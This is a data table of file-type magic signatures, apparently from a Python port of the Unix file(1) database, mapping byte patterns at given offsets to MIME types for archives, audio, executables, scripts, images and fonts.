[0L, 'string', '=', '\032archive', 'application/data'],
[0L, 'leshort', '=', 60000L, 'application/x-arj'],
[0L, 'string', '=', 'HPAK', 'application/data'],
[0L, 'string', '=', '\351,\001JAM application/data', ''],
[2L, 'string', '=', '-lh0-', 'application/x-lha'],
[2L, 'string', '=', '-lh1-', 'application/x-lha'],
[2L, 'string', '=', '-lz4-', 'application/x-lha'],
[2L, 'string', '=', '-lz5-', 'application/x-lha'],
[2L, 'string', '=', '-lzs-', 'application/x-lha'],
[2L, 'string', '=', '-lh -', 'application/x-lha'],
[2L, 'string', '=', '-lhd-', 'application/x-lha'],
[2L, 'string', '=', '-lh2-', 'application/x-lha'],
[2L, 'string', '=', '-lh3-', 'application/x-lha'],
[2L, 'string', '=', '-lh4-', 'application/x-lha'],
[2L, 'string', '=', '-lh5-', 'application/x-lha'],
[0L, 'string', '=', 'Rar!', 'application/x-rar'],
[0L, 'string', '=', 'SQSH', 'application/data'],
[0L, 'string', '=', 'UC2\032', 'application/data'],
[0L, 'string', '=', 'PK\003\004', 'application/zip'],
[20L, 'lelong', '=', 4257523676L, 'application/x-zoo'],
[10L, 'string', '=', '# This is a shell archive', 'application/x-shar'],
[0L, 'string', '=', '*STA', 'application/data'],
[0L, 'string', '=', '2278', 'application/data'],
[0L, 'beshort', '=', 560L, 'application/x-executable-file'],
[0L, 'beshort', '=', 561L, 'application/x-executable-file'],
[0L, 'string', '=', '\000\004\036\212\200', 'application/core'],
[0L, 'string', '=', '.snd', 'audio/basic'],
[0L, 'lelong', '=', 6583086L, 'audio/basic'],
[0L, 'string', '=', 'MThd', 'audio/midi'],
[0L, 'string', '=', 'CTMF', 'audio/x-cmf'],
[0L, 'string', '=', 'SBI', 'audio/x-sbi'],
[0L, 'string', '=', 'Creative Voice File', 'audio/x-voc'],
[0L, 'belong', '=', 1314148939L, 'audio/x-multitrack'],
[0L, 'string', '=', 'RIFF', 'audio/x-wav'],
[0L, 'string', '=', 'EMOD', 'audio/x-emod'],
[0L, 'belong', '=', 779248125L, 'audio/x-pn-realaudio'],
[0L, 'string', '=', 'MTM', 'audio/x-multitrack'],
[0L, 'string', '=', 'if', 'audio/x-669-mod'],
[0L, 'string', '=', 'FAR', 'audio/mod'],
[0L, 'string', '=', 'MAS_U', 'audio/x-multimate-mod'],
[44L, 'string', '=', 'SCRM', 'audio/x-st3-mod'],
[0L, 'string', '=', 'GF1PATCH110\000ID#000002\000', 'audio/x-gus-patch'],
[0L, 'string', '=', 'GF1PATCH100\000ID#000002\000', 'audio/x-gus-patch'],
[0L, 'string', '=', 'JN', 'audio/x-669-mod'],
[0L, 'string', '=', 'UN05', 'audio/x-mikmod-uni'],
[0L, 'string', '=', 'Extended Module:', 'audio/x-ft2-mod'],
[21L, 'string', '=', '!SCREAM!', 'audio/x-st2-mod'],
[1080L, 'string', '=', 'M.K.', 'audio/x-protracker-mod'],
[1080L, 'string', '=', 'M!K!', 'audio/x-protracker-mod'],
[1080L, 'string', '=', 'FLT4', 'audio/x-startracker-mod'],
[1080L, 'string', '=', '4CHN', 'audio/x-fasttracker-mod'],
[1080L, 'string', '=', '6CHN', 'audio/x-fasttracker-mod'],
[1080L, 'string', '=', '8CHN', 'audio/x-fasttracker-mod'],
[1080L, 'string', '=', 'CD81', 'audio/x-oktalyzer-mod'],
[1080L, 'string', '=', 'OKTA', 'audio/x-oktalyzer-mod'],
[1080L, 'string', '=', '16CN', 'audio/x-taketracker-mod'],
[1080L, 'string', '=', '32CN', 'audio/x-taketracker-mod'],
[0L, 'string', '=', 'TOC', 'audio/x-toc'],
[0L, 'short', '=', 3401L, 'application/x-executable-file'],
[0L, 'long', '=', 406L, 'application/x-executable-file'],
[0L, 'short', '=', 406L, 'application/x-executable-file'],
[0L, 'short', '=', 3001L, 'application/x-executable-file'],
[0L, 'lelong', '=', 314L, 'application/x-executable-file'],
[0L, 'string', '=', '//', 'text/cpp'],
[0L, 'string', '=', '\\\\1cw\\', 'application/data'],
[0L, 'string', '=', '\\\\1cw', 'application/data'],
[0L, 'belong&0xffffff00', '=', 2231440384L, 'application/data'],
[0L, 'belong&0xffffff00', '=', 2231487232L, 'application/data'],
[0L, 'short', '=', 575L, 'application/x-executable-file'],
[0L, 'short', '=', 577L, 'application/x-executable-file'],
[4L, 'string', '=', 'pipe', 'application/data'],
[4L, 'string', '=', 'prof', 'application/data'],
[0L, 'string', '=', ': shell', 'application/data'],
[0L, 'string', '=', '#!/bin/sh', 'application/x-sh'],
[0L, 'string', '=', '#! /bin/sh', 'application/x-sh'],
[0L, 'string', '=', '#! /bin/sh', 'application/x-sh'],
[0L, 'string', '=', '#!/bin/csh', 'application/x-csh'],
[0L, 'string', '=', '#! /bin/csh', 'application/x-csh'],
[0L, 'string', '=', '#! /bin/csh', 'application/x-csh'],
[0L, 'string', '=', '#!/bin/ksh', 'application/x-ksh'],
[0L, 'string', '=', '#! /bin/ksh', 'application/x-ksh'],
[0L, 'string', '=', '#! /bin/ksh', 'application/x-ksh'],
[0L, 'string', '=', '#!/bin/tcsh', 'application/x-csh'],
[0L, 'string', '=', '#! /bin/tcsh', 'application/x-csh'],
[0L, 'string', '=', '#! /bin/tcsh', 'application/x-csh'],
[0L, 'string', '=', '#!/usr/local/tcsh', 'application/x-csh'],
[0L, 'string', '=', '#! /usr/local/tcsh', 'application/x-csh'],
[0L, 'string', '=', '#!/usr/local/bin/tcsh', 'application/x-csh'],
[0L, 'string', '=', '#! /usr/local/bin/tcsh', 'application/x-csh'],
[0L, 'string', '=', '#! /usr/local/bin/tcsh', 'application/x-csh'],
[0L, 'string', '=', '#!/usr/local/bin/zsh', 'application/x-zsh'],
[0L, 'string', '=', '#! /usr/local/bin/zsh', 'application/x-zsh'],
[0L, 'string', '=', '#! /usr/local/bin/zsh', 'application/x-zsh'],
[0L, 'string', '=', '#!/usr/local/bin/ash', 'application/x-sh'],
[0L, 'string', '=', '#! /usr/local/bin/ash', 'application/x-zsh'],
[0L, 'string', '=', '#! /usr/local/bin/ash', 'application/x-zsh'],
[0L, 'string', '=', '#!/usr/local/bin/ae', 'text/script'],
[0L, 'string', '=', '#! /usr/local/bin/ae', 'text/script'],
[0L, 'string', '=', '#! /usr/local/bin/ae', 'text/script'],
[0L, 'string', '=', '#!/bin/nawk', 'application/x-awk'],
[0L, 'string', '=', '#! /bin/nawk', 'application/x-awk'],
[0L, 'string', '=', '#! /bin/nawk', 'application/x-awk'],
[0L, 'string', '=', '#!/usr/bin/nawk', 'application/x-awk'],
[0L, 'string', '=', '#! /usr/bin/nawk', 'application/x-awk'],
[0L, 'string', '=', '#! /usr/bin/nawk', 'application/x-awk'],
[0L, 'string', '=', '#!/usr/local/bin/nawk', 'application/x-awk'],
[0L, 'string', '=', '#! /usr/local/bin/nawk', 'application/x-awk'],
[0L, 'string', '=', '#! /usr/local/bin/nawk', 'application/x-awk'],
[0L, 'string', '=', '#!/bin/gawk', 'application/x-awk'],
[0L, 'string', '=', '#! /bin/gawk', 'application/x-awk'],
[0L, 'string', '=', '#! /bin/gawk', 'application/x-awk'],
[0L, 'string', '=', '#!/usr/bin/gawk', 'application/x-awk'],
[0L, 'string', '=', '#! /usr/bin/gawk', 'application/x-awk'],
[0L, 'string', '=', '#! /usr/bin/gawk', 'application/x-awk'],
[0L, 'string', '=', '#!/usr/local/bin/gawk', 'application/x-awk'],
[0L, 'string', '=', '#! /usr/local/bin/gawk', 'application/x-awk'],
[0L, 'string', '=', '#! /usr/local/bin/gawk', 'application/x-awk'],
[0L, 'string', '=', '#!/bin/awk', 'application/x-awk'],
[0L, 'string', '=', '#! /bin/awk', 'application/x-awk'],
[0L, 'string', '=', '#! /bin/awk', 'application/x-awk'],
[0L, 'string', '=', '#!/usr/bin/awk', 'application/x-awk'],
[0L, 'string', '=', '#! /usr/bin/awk', 'application/x-awk'],
[0L, 'string', '=', '#! /usr/bin/awk', 'application/x-awk'],
[0L, 'string', '=', 'BEGIN', 'application/x-awk'],
[0L, 'string', '=', '#!/bin/perl', 'application/x-perl'],
[0L, 'string', '=', '#! /bin/perl', 'application/x-perl'],
[0L, 'string', '=', '#! /bin/perl', 'application/x-perl'],
[0L, 'string', '=', 'eval "exec /bin/perl', 'application/x-perl'],
[0L, 'string', '=', '#!/usr/bin/perl', 'application/x-perl'],
[0L, 'string', '=', '#! /usr/bin/perl', 'application/x-perl'],
[0L, 'string', '=', '#! /usr/bin/perl', 'application/x-perl'],
[0L, 'string', '=', 'eval "exec /usr/bin/perl', 'application/x-perl'],
[0L, 'string', '=', '#!/usr/local/bin/perl', 'application/x-perl'],
[0L, 'string', '=', '#! /usr/local/bin/perl', 'application/x-perl'],
[0L, 'string', '=', '#! /usr/local/bin/perl', 'application/x-perl'],
[0L, 'string', '=', 'eval "exec /usr/local/bin/perl', 'application/x-perl'],
[0L, 'string', '=', '#!/bin/python', 'application/x-python'],
[0L, 'string', '=', '#! /bin/python', 'application/x-python'],
[0L, 'string', '=', '#! /bin/python', 'application/x-python'],
[0L, 'string', '=', 'eval "exec /bin/python', 'application/x-python'],
[0L, 'string', '=', '#!/usr/bin/python', 'application/x-python'],
[0L, 'string', '=', '#! /usr/bin/python', 'application/x-python'],
[0L, 'string', '=', '#! /usr/bin/python', 'application/x-python'],
[0L, 'string', '=', 'eval "exec /usr/bin/python', 'application/x-python'],
[0L, 'string', '=', '#!/usr/local/bin/python', 'application/x-python'],
[0L, 'string', '=', '#! /usr/local/bin/python', 'application/x-python'],
[0L, 'string', '=', '#! /usr/local/bin/python', 'application/x-python'],
[0L, 'string', '=', 'eval "exec /usr/local/bin/python', 'application/x-python'],
[0L, 'string', '=', '#!/usr/bin/env python', 'application/x-python'],
[0L, 'string', '=', '#! /usr/bin/env python', 'application/x-python'],
[0L, 'string', '=', '#!/bin/rc', 'text/script'],
[0L, 'string', '=', '#! /bin/rc', 'text/script'],
[0L, 'string', '=', '#! /bin/rc', 'text/script'],
[0L, 'string', '=', '#!/bin/bash', 'application/x-sh'],
[0L, 'string', '=', '#! /bin/bash', 'application/x-sh'],
[0L, 'string', '=', '#! /bin/bash', 'application/x-sh'],
[0L, 'string', '=', '#!/usr/local/bin/bash', 'application/x-sh'],
[0L, 'string', '=', '#! /usr/local/bin/bash', 'application/x-sh'],
[0L, 'string', '=', '#! /usr/local/bin/bash', 'application/x-sh'],
[0L, 'string', '=', '#! /', 'text/script'],
[0L, 'string', '=', '#! /', 'text/script'],
[0L, 'string', '=', '#!/', 'text/script'],
[0L, 'string', '=', '#! text/script', ''],
[0L, 'string', '=', '\037\235', 'application/compress'],
[0L, 'string', '=', '\037\213', 'application/x-gzip'],
[0L, 'string', '=', '\037\036', 'application/data'],
[0L, 'short', '=', 17437L, 'application/data'],
[0L, 'short', '=', 8191L, 'application/data'],
[0L, 'string', '=', '\377\037', 'application/data'],
[0L, 'short', '=', 145405L, 'application/data'],
[0L, 'string', '=', 'BZh', 'application/x-bzip2'],
[0L, 'leshort', '=', 65398L, 'application/data'],
[0L, 'leshort', '=', 65142L, 'application/data'],
[0L, 'leshort', '=', 64886L, 'application/x-lzh'],
[0L, 'string', '=', '\037\237', 'application/data'],
[0L, 'string', '=', '\037\236', 'application/data'],
[0L, 'string', '=', '\037\240', 'application/data'],
[0L, 'string', '=', 'BZ', 'application/x-bzip'],
[0L, 'string', '=', '\211LZO\000\015\012\032\012', 'application/data'],
[0L, 'belong', '=', 507L, 'application/x-object-file'],
[0L, 'belong', '=', 513L, 'application/x-executable-file'],
[0L, 'belong', '=', 515L, 'application/x-executable-file'],
[0L, 'belong', '=', 517L, 'application/x-executable-file'],
[0L, 'belong', '=', 70231L, 'application/core'],
[24L, 'belong', '=', 60011L, 'application/data'],
[24L, 'belong', '=', 60012L, 'application/data'],
[24L, 'belong', '=', 60013L, 'application/data'],
[24L, 'belong', '=', 60014L, 'application/data'],
[0L, 'belong', '=', 601L, 'application/x-object-file'],
[0L, 'belong', '=', 607L, 'application/data'],
[0L, 'belong', '=', 324508366L, 'application/x-gdbm'],
[0L, 'lelong', '=', 324508366L, 'application/x-gdbm'],
[0L, 'string', '=', 'GDBM', 'application/x-gdbm'],
[0L, 'belong', '=', 398689L, 'application/x-db'],
[0L, 'belong', '=', 340322L, 'application/x-db'],
[0L, 'string', '=', '<list>\012<protocol bbn-m', 'application/data'],
[0L, 'string', '=', 'diff text/x-patch', ''],
[0L, 'string', '=', '*** text/x-patch', ''],
[0L, 'string', '=', 'Only in text/x-patch', ''],
[0L, 'string', '=', 'Common subdirectories: text/x-patch', ''],
[0L, 'string', '=', '!<arch>\012________64E', 'application/data'],
[0L, 'leshort', '=', 387L, 'application/x-executable-file'],
[0L, 'leshort', '=', 392L, 'application/x-executable-file'],
[0L, 'leshort', '=', 399L, 'application/x-object-file'],
[0L, 'string', '=', '\377\377\177', 'application/data'],
[0L, 'string', '=', '\377\377|', 'application/data'],
[0L, 'string', '=', '\377\377~', 'application/data'],
[0L, 'string', '=', '\033c\033', 'application/data'],
[0L, 'long', '=', 4553207L, 'image/x11'],
[0L, 'string', '=', '!<PDF>!\012', 'application/x-prof'],
[0L, 'short', '=', 1281L, 'application/x-locale'],
[24L, 'belong', '=', 60012L, 'application/x-dump'],
[24L, 'belong', '=', 60011L, 'application/x-dump'],
[24L, 'lelong', '=', 60012L, 'application/x-dump'],
[24L, 'lelong', '=', 60011L, 'application/x-dump'],
[0L, 'string', '=', '\177ELF', 'application/x-executable-file'],
[0L, 'short', '=', 340L, 'application/data'],
[0L, 'short', '=', 341L, 'application/x-executable-file'],
[1080L, 'leshort', '=', 61267L, 'application/x-linux-ext2fs'],
[0L, 'string', '=', '\366\366\366\366', 'application/x-pc-floppy'],
[774L, 'beshort', '=', 55998L, 'application/data'],
[510L, 'leshort', '=', 43605L, 'application/data'],
[1040L, 'leshort', '=', 4991L, 'application/x-filesystem'],
[1040L, 'leshort', '=', 5007L, 'application/x-filesystem'],
[1040L, 'leshort', '=', 9320L, 'application/x-filesystem'],
[1040L, 'leshort', '=', 9336L, 'application/x-filesystem'],
[0L, 'string', '=', '-rom1fs-\000', 'application/x-filesystem'],
[395L, 'string', '=', 'OS/2', 'application/x-bootable'],
[0L, 'string', '=', 'FONT', 'font/x-vfont'],
[0L, 'short', '=', 436L, 'font/x-vfont'],
[0L, 'short', '=', 17001L, 'font/x-vfont'],
[0L, 'string', '=', '%!PS-AdobeFont-1.0', 'font/type1'],
[6L, 'string', '=', '%!PS-AdobeFont-1.0', 'font/type1'],
[0L, 'belong', '=', 4L, 'font/x-snf'],
[0L, 'lelong', '=', 4L, 'font/x-snf'],
[0L, 'string', '=', 'STARTFONT font/x-bdf', ''],
[0L, 'string', '=', '\001fcp', 'font/x-pcf'],
[0L, 'string', '=', 'D1.0\015', 'font/x-speedo'],
[0L, 'string', '=', 'flf', 'font/x-figlet'],
[0L, 'string', '=', 'flc', 'application/x-font'],
[0L, 'belong', '=', 335698201L, 'font/x-libgrx'],
[0L, 'belong', '=', 4282797902L, 'font/x-dos'],
[7L, 'belong', '=', 4540225L, 'font/x-dos'],
[7L, 'belong', '=', 5654852L, 'font/x-dos'],
[4098L, 'string', '=', 'DOSFONT', 'font/x-dos'],
[0L, 'string', '=', '<MakerFile', 'application/x-framemaker'],
[0L, 'string', '=', '<MIFFile', 'application/x-framemaker'],
[0L, 'string', '=', '<MakerDictionary', 'application/x-framemaker'],
[0L, 'string', '=', '<MakerScreenFont', 'font/x-framemaker'],
[0L, 'string', '=', '<MML', 'application/x-framemaker'],
[0L, 'string', '=', '<BookFile', 'application/x-framemaker'],
[0L, 'string', '=', '<Maker', 'application/x-framemaker'],
[0L, 'lelong&0377777777', '=', 41400407L, 'application/x-executable-file'],
[0L, 'lelong&0377777777', '=', 41400410L, 'application/x-executable-file'],
[0L, 'lelong&0377777777', '=', 41400413L, 'application/x-executable-file'],
[0L, 'lelong&0377777777', '=', 41400314L, 'application/x-executable-file'],
[7L, 'string', '=', '\357\020\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000', 'application/core'],
[0L, 'lelong', '=', 11421044151L, 'application/data'],
[0L, 'string', '=', 'GIMP Gradient', 'application/x-gimp-gradient'],
[0L, 'string', '=', 'gimp xcf', 'application/x-gimp-image'],
[20L, 'string', '=', 'GPAT', 'application/x-gimp-pattern'],
[20L, 'string', '=', 'GIMP', 'application/x-gimp-brush'],
[0L, 'string', '=', '\336\022\004\225', 'application/x-locale'],
[0L, 'string', '=', '\225\004\022\336', 'application/x-locale'],
[0L, 'beshort', '=', 627L, 'application/x-executable-file'],
[0L, 'beshort', '=', 624L, 'application/x-executable-file'],
[0L, 'string', '=', '\000\001\000\000\000', 'font/ttf'],
[0L, 'long', '=', 1203604016L, 'application/data'],
[0L, 'long', '=', 1702407010L, 'application/data'],
[0L, 'long', '=', 1003405017L, 'application/data'],
[0L, 'long', '=', 1602007412L, 'application/data'],
[0L, 'belong', '=', 34603270L, 'application/x-object-file'],
[0L, 'belong', '=', 34603271L, 'application/x-executable-file'],
[0L, 'belong', '=', 34603272L, 'application/x-executable-file'],
[0L, 'belong', '=', 34603275L, 'application/x-executable-file'],
[0L, 'belong', '=', 34603278L, 'application/x-library-file'],
[0L, 'belong', '=', 34603277L, 'application/x-library-file'],
[0L, 'belong', '=', 34865414L, 'application/x-object-file'],
[0L, 'belong', '=', 34865415L, 'application/x-executable-file'],
[0L, 'belong', '=', 34865416L, 'application/x-executable-file'],
[0L, 'belong', '=', 34865419L, 'application/x-executable-file'],
[0L, 'belong', '=', 34865422L, 'application/x-library-file'],
[0L, 'belong', '=', 34865421L, 'application/x-object-file'],
[0L, 'belong', '=', 34275590L, 'application/x-object-file'],
[0L, 'belong', '=', 34275591L, 'application/x-executable-file'],
[0L, 'belong', '=', 34275592L, 'application/x-executable-file'],
[0L, 'belong', '=', 34275595L, 'application/x-executable-file'],
[0L, 'belong', '=', 34275598L, 'application/x-library-file'],
[0L, 'belong', '=', 34275597L, 'application/x-library-file'],
[0L, 'belong', '=', 557605234L, 'application/x-ar'],
[0L, 'long', '=', 34078982L, 'application/x-executable-file'],
[0L, 'long', '=', 34078983L, 'application/x-executable-file'],
[0L, 'long', '=', 34078984L, 'application/x-executable-file'],
[0L, 'belong', '=', 34341128L, 'application/x-executable-file'],
[0L, 'belong', '=', 34341127L, 'application/x-executable-file'],
[0L, 'belong', '=', 34341131L, 'application/x-executable-file'],
[0L, 'belong', '=', 34341126L, 'application/x-executable-file'],
[0L, 'belong', '=', 34210056L, 'application/x-executable-file'],
[0L, 'belong', '=', 34210055L, 'application/x-executable-file'],
[0L, 'belong', '=', 34341134L, 'application/x-library-file'],
[0L, 'belong', '=', 34341133L, 'application/x-library-file'],
[0L, 'long', '=', 65381L, 'application/x-library-file'],
[0L, 'long', '=', 34275173L, 'application/x-library-file'],
[0L, 'long', '=', 34406245L, 'application/x-library-file'],
[0L, 'long', '=', 34144101L, 'application/x-library-file'],
[0L, 'long', '=', 22552998L, 'application/core'],
[0L, 'long', '=', 1302851304L, 'font/x-hp-windows'],
[0L, 'string', '=', 'Bitmapfile', 'image/unknown'],
[0L, 'string', '=', 'IMGfile', 'CIS image/unknown'],
[0L, 'long', '=', 34341132L, 'application/x-lisp'],
[0L, 'string', '=', 'msgcat01', 'application/x-locale'],
[0L, 'string', '=', 'HPHP48-', 'HP48 binary'],
[0L, 'string', '=', '%%HP:', 'HP48 text'],
[0L, 'beshort', '=', 200L, 'hp200 (68010) BSD'],
[0L, 'beshort', '=', 300L, 'hp300 (68020+68881) BSD'],
[0L, 'beshort', '=', 537L, '370 XA sysV executable'],
[0L, 'beshort', '=', 532L, '370 XA sysV pure executable'],
[0L, 'beshort', '=', 54001L, '370 sysV pure executable'],
[0L, 'beshort', '=', 55001L, '370 XA sysV pure executable'],
[0L, 'beshort', '=', 56401L, '370 sysV executable'],
[0L, 'beshort', '=', 57401L, '370 XA sysV executable'],
[0L, 'beshort', '=', 531L, 'SVR2 executable (Amdahl-UTS)'],
[0L, 'beshort', '=', 534L, 'SVR2 pure executable (Amdahl-UTS)'],
[0L, 'beshort', '=', 530L, 'SVR2 pure executable (USS/370)'],
[0L, 'beshort', '=', 535L, 'SVR2 executable (USS/370)'],
[0L, 'beshort', '=', 479L, 'executable (RISC System/6000 V3.1) or obj module'],
[0L, 'beshort', '=', 260L, 'shared library'],
[0L, 'beshort', '=', 261L, 'ctab data'],
[0L, 'beshort', '=', 65028L, 'structured file'],
[0L, 'string', '=', '0xabcdef', 'AIX message catalog'],
[0L, 'belong', '=', 505L, 'AIX compiled message catalog'],
[0L, 'string', '=', '<aiaff>', 'archive'],
[0L, 'string', '=', 'FORM', 'IFF data'],
[0L, 'string', '=', 'P1', 'image/x-portable-bitmap'],
[0L, 'string', '=', 'P2', 'image/x-portable-graymap'],
[0L, 'string', '=', 'P3', 'image/x-portable-pixmap'],
[0L, 'string', '=', 'P4', 'image/x-portable-bitmap'],
[0L, 'string', '=', 'P5', 'image/x-portable-graymap'],
[0L, 'string', '=', 'P6', 'image/x-portable-pixmap'],
[0L, 'string', '=', 'IIN1', 'image/tiff'],
[0L, 'string', '=', 'MM\000*', 'image/tiff'],
[0L, 'string', '=', 'II*\000', 'image/tiff'],
[0L, 'string', '=', '\211PNG', 'image/x-png'],
[1L, 'string', '=', 'PNG', 'image/x-png'],
[0L, 'string', '=', 'GIF8', 'image/gif'],
[0L, 'string', '=', '\361\000@\273', 'image/x-cmu-raster'],
[0L, 'string', '=', 'id=ImageMagick', 'MIFF image data'],
[0L, 'long', '=', 1123028772L, 'Artisan image data'],
[0L, 'string', '=', '#FIG', 'FIG image text'],
[0L, 'string', '=', 'ARF_BEGARF', 'PHIGS clear text archive'],
[0L, 'string', '=', '@(#)SunPHIGS', 'SunPHIGS'],
[0L, 'string', '=', 'GKSM', 'GKS Metafile'],
[0L, 'string', '=', 'BEGMF', 'clear text Computer Graphics Metafile'],
[0L, 'beshort&0xffe0', '=', 32L, 'binary Computer Graphics Metafile'],
[0L, 'beshort', '=', 12320L, 'character Computer Graphics Metafile'],
[0L, 'string', '=', 'yz', 'MGR bitmap, modern format, 8-bit aligned'],
[0L, 'string', '=', 'zz', 'MGR bitmap, old format, 1-bit deep, 16-bit aligned'],
[0L, 'string', '=', 'xz', 'MGR bitmap, old format, 1-bit deep, 32-bit aligned'],
[0L, 'string', '=', 'yx', 'MGR bitmap, modern format, squeezed'],
[0L, 'string', '=', '%bitmap\000', 'FBM image data'],
[1L, 'string', '=', 'PC Research, Inc', 'group 3 fax data'],
[0L, 'beshort', '=', 65496L, 'image/jpeg'],
[0L, 'string', '=', 'hsi1', 'image/x-jpeg-proprietary'],
[0L, 'string', '=', 'BM', 'image/x-bmp'],
[0L, 'string', '=', 'IC', 'image/x-ico'],
[0L, 'string', '=', 'PI', 'PC pointer image data'],
[0L, 'string', '=', 'CI', 'PC color icon data'],
[0L, 'string', '=', 'CP', 'PC color pointer image data'],
[0L, 'string', '=', '/* XPM */', 'X pixmap image text'],
[0L, 'leshort', '=', 52306L, 'RLE image data,'],
[0L, 'string', '=', 'Imagefile version-', 'iff image data'],
[0L, 'belong', '=', 1504078485L, 'x/x-image-sun-raster'],
[0L, 'beshort', '=', 474L, 'x/x-image-sgi'],
[0L, 'string', '=', 'IT01', 'FIT image data'],
[0L, 'string', '=', 'IT02', 'FIT image data'],
[2048L, 'string', '=', 'PCD_IPI', 'x/x-photo-cd-pack-file'],
[0L, 'string', '=', 'PCD_OPA', 'x/x-photo-cd-overfiew-file'],
[0L, 'string', '=', 'SIMPLE =', 'FITS image data'],
[0L, 'string', '=', 'This is a BitMap file', 'Lisp Machine bit-array-file'],
[0L, 'string', '=', '!!', 'Bennet Yee\'s "face" format'],
[0L, 'beshort', '=', 4112L, 'PEX Binary Archive'],
[3000L, 'string', '=', 'Visio (TM) Drawing', '%s'],
[0L, 'leshort', '=', 502L, 'basic-16 executable'],
[0L, 'leshort', '=', 503L, 'basic-16 executable (TV)'],
[0L, 'leshort', '=', 510L, 'application/x-executable-file'],
[0L, 'leshort', '=', 511L, 'application/x-executable-file'],
[0L, 'leshort', '=', 512L, 'application/x-executable-file'],
[0L, 'leshort', '=', 522L, 'application/x-executable-file'],
[0L, 'leshort', '=', 514L, 'application/x-executable-file'],
[0L, 'string', '=', '\210OPS', 'Interleaf saved data'],
[0L, 'string', '=', '<!OPS', 'Interleaf document text'],
[4L, 'string', '=', 'pgscriptver', 'IslandWrite document'],
[13L, 'string', '=', 'DrawFile', 'IslandDraw document'],
[0L, 'leshort&0xFFFC', '=', 38400L, 'little endian ispell'],
[0L, 'beshort&0xFFFC', '=', 38400L, 'big endian ispell'],
[0L, 'belong', '=', 3405691582L, 'compiled Java class data,'],
[0L, 'beshort', '=', 44269L, 'Java serialization data'],
[0L, 'string', '=', 'KarmaRHD', 'Version Karma Data Structure Version'],
[0L, 'string', '=', 'lect', 'DEC SRC Virtual Paper Lectern file'],
[53L, 'string', '=', 'yyprevious', 'C program text (from lex)'],
[21L, 'string', '=', 'generated by flex', 'C program text (from flex)'],
[0L, 'string', '=', '%{', 'lex description text'],
[0L, 'short', '=', 32768L, 'lif file'],
[0L, 'lelong', '=', 6553863L, 'Linux/i386 impure executable (OMAGIC)'],
[0L, 'lelong', '=', 6553864L, 'Linux/i386 pure executable (NMAGIC)'],
[0L, 'lelong', '=', 6553867L, 'Linux/i386 demand-paged executable (ZMAGIC)'],
[0L, 'lelong', '=', 6553804L, 'Linux/i386 demand-paged executable (QMAGIC)'],
[0L, 'string', '=', '\007\001\000', 'Linux/i386 object file'],
[0L, 'string', '=', '\001\003\020\004', 'Linux-8086 impure executable'],
[0L, 'string', '=', '\001\003 \004', 'Linux-8086 executable'],
[0L, 'string', '=', '\243\206\001\000', 'Linux-8086 object file'],
[0L, 'string', '=', '\001\003\020\020', 'Minix-386 impure executable'],
[0L, 'string', '=', '\001\003 \020', 'Minix-386 executable'],
[0L, 'string', '=', '*nazgul*', 'Linux compiled message catalog'],
[216L, 'lelong', '=', 421L, 'Linux/i386 core file'],
[2L, 'string', '=', 'LILO', 'Linux/i386 LILO boot/chain loader'],
[0L, 'string', '=', '0.9', ''],
[0L, 'leshort', '=', 1078L, 'font/linux-psf'],
[4086L, 'string', '=', 'SWAP-SPACE', 'Linux/i386 swap file'],
[0L, 'leshort', '=', 387L, 'ECOFF alpha'],
[514L, 'string', '=', 'HdrS', 'Linux kernel'],
[0L, 'belong', '=', 3099592590L, 'Linux kernel'],
[0L, 'string', '=', 'Begin3', 'Linux Software Map entry text'],
[0L, 'string', '=', ';;', 'Lisp/Scheme program text'],
[0L, 'string', '=', '\012(', 'byte-compiled Emacs-Lisp program data'],
[0L, 'string', '=', ';ELC\023\000\000\000', 'byte-compiled Emacs-Lisp program data'],
[0L, 'string', '=', "(SYSTEM::VERSION '", 'CLISP byte-compiled Lisp program text'],
[0L, 'long', '=', 1886817234L, 'CLISP memory image data'],
[0L, 'long', '=', 3532355184L, 'CLISP memory image data, other endian'],
[0L, 'long', '=', 3725722773L, 'GNU-format message catalog data'],
[0L, 'long', '=', 2500072158L, 'GNU-format message catalog data'],
[0L, 'belong', '=', 3405691582L, 'mach-o fat file'],
[0L, 'belong', '=', 4277009102L, 'mach-o'],
[11L, 'string', '=', 'must be converted with BinHex', 'BinHex binary text'],
[0L, 'string', '=', 'SIT!', 'StuffIt Archive (data)'],
[65L, 'string', '=', 'SIT!', 'StuffIt Archive (rsrc + data)'],
[0L, 'string', '=', 'SITD', 'StuffIt Deluxe (data)'],
[65L, 'string', '=', 'SITD', 'StuffIt Deluxe (rsrc + data)'],
[0L, 'string', '=', 'Seg', 'StuffIt Deluxe Segment (data)'],
[65L, 'string', '=', 'Seg', 'StuffIt Deluxe Segment (rsrc + data)'],
[0L, 'string', '=', 'APPL', 'Macintosh Application (data)'],
[65L, 'string', '=', 'APPL', 'Macintosh Application (rsrc + data)'],
[0L, 'string', '=', 'zsys', 'Macintosh System File (data)'],
[65L, 'string', '=', 'zsys', 'Macintosh System File(rsrc + data)'],
[0L, 'string', '=', 'FNDR', 'Macintosh Finder (data)'],
[65L, 'string', '=', 'FNDR', 'Macintosh Finder(rsrc + data)'],
[0L, 'string', '=', 'libr', 'Macintosh Library (data)'],
[65L, 'string', '=', 'libr', 'Macintosh Library(rsrc + data)'],
[0L, 'string', '=', 'shlb', 'Macintosh Shared Library (data)'],
[65L, 'string', '=', 'shlb', 'Macintosh Shared Library(rsrc + data)'],
[0L, 'string', '=', 'cdev', 'Macintosh Control Panel (data)'],
[65L, 'string', '=', 'cdev', 'Macintosh Control Panel(rsrc + data)'],
[0L, 'string', '=', 'INIT', 'Macintosh Extension (data)'],
[65L, 'string', '=', 'INIT', 'Macintosh Extension(rsrc + data)'],
[0L, 'string', '=', 'FFIL', 'font/ttf'],
[65L, 'string', '=', 'FFIL', 'font/ttf'],
[0L, 'string', '=', 'LWFN', 'font/type1'],
[65L, 'string', '=', 'LWFN', 'font/type1'],
[0L, 'string', '=', 'PACT', 'Macintosh Compact Pro Archive (data)'],
[65L, 'string', '=', 'PACT', 'Macintosh Compact Pro Archive(rsrc + data)'],
[0L, 'string', '=', 'ttro', 'Macintosh TeachText File (data)'],
[65L, 'string', '=', 'ttro', 'Macintosh TeachText File(rsrc + data)'],
[0L, 'string', '=', 'TEXT', 'Macintosh TeachText File (data)'],
[65L, 'string', '=', 'TEXT', 'Macintosh TeachText File(rsrc + data)'],
[0L, 'string', '=', 'PDF', 'Macintosh PDF File (data)'],
[65L, 'string', '=', 'PDF', 'Macintosh PDF File(rsrc + data)'],
[0L, 'string', '=', '# Magic', 'magic text file for file(1) cmd'],
[0L, 'string', '=', 'Relay-Version:', 'old news text'],
